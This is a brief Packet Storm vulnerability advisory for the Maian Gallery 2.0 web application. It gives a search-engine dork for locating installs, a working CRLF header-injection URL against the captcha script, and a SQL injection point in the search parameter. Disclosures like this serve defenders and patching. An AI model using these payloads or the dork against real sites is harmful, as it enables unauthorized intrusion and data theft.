Maian Gallery 2.0 SQL Injection / Header Injection

2015-06-04T00:00:00
ID PACKETSTORM:132154
Type packetstorm
Reporter indoushka
Modified 2015-06-04T00:00:00

Description

                                        
                                            `| # Title : Maian Gallery v2.0 Mulllti Vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Dork : Maian Gallery v2.0. Copyright © 2006-2015 Maian Script World. All Rights Reserved  
| # Tested on: Win 8.1 fr pro / 21:58 * 15/05/2015  
| # Bug : Mulllti  
| # Download : http://www.maiangallery.com/  
=======================================  
  
CRLF injection/HTTP response splitting :  
  
/gallery/captcha/cryptographp.php?cfg=%0d%0a%20InjectedHeader:her  
  
SQL injection :  
  
/gallery/index.php?cmd=search&keywords=1&search_type=( inject her )  
`